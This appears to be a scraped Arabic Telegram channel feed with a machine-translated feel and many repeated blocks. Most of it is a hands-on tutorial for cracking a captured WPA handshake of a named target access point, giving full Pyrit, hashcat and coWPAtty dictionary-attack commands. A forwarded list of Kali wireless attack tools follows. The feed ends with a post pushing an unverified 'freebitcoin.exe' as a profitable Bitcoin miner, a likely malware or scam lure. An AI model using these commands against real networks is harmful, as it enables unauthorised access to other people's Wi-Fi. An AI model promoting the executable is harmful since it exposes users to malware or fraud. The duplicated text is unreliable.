انتظر الآن حتى يتم التقاط مصافحة WPA ثم اضغط على crtl ^ c.
سيتم الآن إنشاء ملف باسم sommay-01.cap
سيتم الآن إنشاء ملف باسم sommay-01.cap
PYRIT
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
OCLHASHCAT
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
الآن قم بنسخ القاموس الذي تريد استخدامه في مجلد Hashcat. أدخل الآن في المجلد hashcat وتشغيل الأمر:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
COWPATTY
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.
الآن قم بتشغيل الأمر:
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d ==
المسار إلى القاموس أنشأناه مع genpmk
-r ==
المسار إلى ملف الالتقاط الذي أنشأناه باستخدام airodump-ng
-s ==
ESSID للهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d ==
المسار إلى القاموس أنشأناه مع genpmk
-r ==
المسار إلى ملف الالتقاط الذي أنشأناه باستخدام airodump-ng
-s ==
ESSID للهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
Forwarded from عالم الهكر العربي (Database_HK)
ادوات و اوامر الهجمات اللاسلكية الموجودة بكالي راح يتم الشرح عنها كلها او جزء كبير منها
Airbase-ng
Aircrack-ng
Airdecap-ng and Airdecloak-ng
Aireplay-ng
airgraph-ng
Airmon-ng
Airodump-ng
airodump-ng-oui-update
Airolib-ng
Airserv-ng
Airtun-ng
Asleap
Besside-ng
Bluelog
BlueMaho
Bluepot
BlueRanger
Bluesnarfer
Bully
coWPAtty
crackle
eapmd5pass
Easside-ng
Fern Wifi Cracker
FreeRADIUS-WPE
Ghost Phisher
GISKismet
Gqrx
gr-scan
hostapd-wpe
ivstools
kalibrate-rtl
KillerBee
Kismet
makeivs-ng
mdk3
mfcuk
mfoc
mfterm
Multimon-NG
Packetforge-ng
PixieWPS
Pyrit
Reaver
redfang
RTLSDR Scanner
Spooftooph
Tkiptun-ng
Wesside-ng
Wifi Honey
wifiphisher
Wifitap
Wifite
wpaclean
#CS
Airbase-ng
Aircrack-ng
Airdecap-ng and Airdecloak-ng
Aireplay-ng
airgraph-ng
Airmon-ng
Airodump-ng
airodump-ng-oui-update
Airolib-ng
Airserv-ng
Airtun-ng
Asleap
Besside-ng
Bluelog
BlueMaho
Bluepot
BlueRanger
Bluesnarfer
Bully
coWPAtty
crackle
eapmd5pass
Easside-ng
Fern Wifi Cracker
FreeRADIUS-WPE
Ghost Phisher
GISKismet
Gqrx
gr-scan
hostapd-wpe
ivstools
kalibrate-rtl
KillerBee
Kismet
makeivs-ng
mdk3
mfcuk
mfoc
mfterm
Multimon-NG
Packetforge-ng
PixieWPS
Pyrit
Reaver
redfang
RTLSDR Scanner
Spooftooph
Tkiptun-ng
Wesside-ng
Wifi Honey
wifiphisher
Wifitap
Wifite
wpaclean
#CS
Forwarded from Deleted Account
freebitcoin.exe
10.9 MB
اروع برنامج لتعدين البيتكوين مخصص لانظمة الويندوز فقط . مجرب شخصيا و حاصل منه لحد الان باستخدم 15 يوم 👇🏽👇🏽👇🏽👇🏽👇🏽👇🏽👇🏽